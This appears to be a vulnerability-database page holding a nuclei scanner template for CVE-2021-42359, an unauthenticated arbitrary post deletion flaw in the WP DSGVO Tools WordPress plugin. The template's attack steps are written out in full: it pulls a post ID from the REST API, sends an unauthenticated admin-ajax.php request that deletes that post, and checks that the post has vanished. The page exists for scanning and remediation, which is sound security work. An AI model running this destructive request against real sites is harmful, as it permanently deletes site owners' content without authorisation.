Lucene search
K

WP DSGVO Tools (GDPR) <= 3.1.23 - Unauthenticated Arbitrary Post Deletion

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Unauthenticated post deletion via admin-dismiss-unsubscribe in WordPress tools, bypassing nonce and capability checks.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-42359
19 Sep 202513:04
circl
CNNVD
WordPress 访问控制错误漏洞
5 Nov 202100:00
cnnvd
CNVD
WordPress DSGVO Tools Access Control Error Vulnerability
10 Nov 202100:00
cnvd
CVE
CVE-2021-42359
5 Nov 202119:44
cve
Cvelist
CVE-2021-42359 WP DSGVO Tools (GDPR) <= 3.1.23 Unauthenticated Arbitrary Post Deletion
5 Nov 202119:44
cvelist
EUVD
EUVD-2021-29330
5 Nov 202119:44
euvd
NVD
CVE-2021-42359
5 Nov 202121:15
nvd
OSV
CVE-2021-42359
5 Nov 202121:15
osv
Patchstack
WordPress WP DSGVO Tools (GDPR) plugin <= 3.1.22 - Unauthenticated Arbitrary Post Deletion vulnerability
2 Nov 202100:00
patchstack
Prion
Design/Logic Flaw
5 Nov 202121:15
prion
Rows per page
id: CVE-2021-42359

info:
  name: WP DSGVO Tools (GDPR) <= 3.1.23 - Unauthenticated Arbitrary Post Deletion
  author: daffainfo
  severity: high
  description: |
    WP DSGVO Tools (GDPR) <= 3.1.23 had an AJAX action, ‘admin-dismiss-unsubscribe‘, which lacked a capability check and a nonce check and was available to unauthenticated users, and did not check the post type when deleting unsubscription requests. As such, it was possible for an attacker to permanently delete an arbitrary post or page on the site by sending an AJAX request with the “action” parameter set to “admin-dismiss-unsubscribe” and the “id” parameter set to the post to be deleted. Sending such a request would move the post to the trash, and repeating the request would permanently delete the post in question.
  impact: |
    Unauthenticated attackers can permanently delete arbitrary WordPress posts and pages by exploiting the unprotected admin-dismiss-unsubscribe AJAX action.
  remediation: |
    Upgrade to WP DSGVO Tools version 3.1.24 or later.
  reference:
    - https://www.wordfence.com/blog/2021/11/vulnerability-in-wp-dsgvo-tools-gdpr-plugin-allows-unauthenticated-page-deletion/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42359
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2021-42359
    epss-score: 0.0393
    epss-percentile: 0.89109
    cwe-id: CWE-862,CWE-284
    cpe: cpe:2.3:a:legalweb:wp_dsgvo_tools:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: legalweb
    product: wp_dsgvo_tools
    framework: wordpress
    fofa-query: body="/wp-content/plugins/shapepress-dsgvo/"
    publicwww-query: "/wp-content/plugins/shapepress-dsgvo/"
  tags: cve,cve2021,wp,wordpress,wp-plugin,dsgvo,intrusive,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/posts"
        - "?rest_route=/wp/v2/posts"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "[{\"id", "name\":")'
        condition: and
        internal: true

    extractors:
      - type: json
        name: post_id
        internal: true
        json:
          - '.[0].id'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=admin-dismiss-unsubscribe&id={{post_id}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json/wp/v2/posts"
        - "?rest_route=/wp/v2/posts"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - '!contains(body, "\"id\":{{post_id}}")'
        condition: and
# digest: 4a0a00473045022100e51bf357f6455d48388ec9f0a23c080aa534e5e13f6e3575b2cd437a46153b8402203333439947027b20aa00ca27ee942dcde0536c05dd4416ee6d3b1e14995c0145:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.4
CVSS 3.17.5 - 9.1
EPSS0.0393
SSVC
13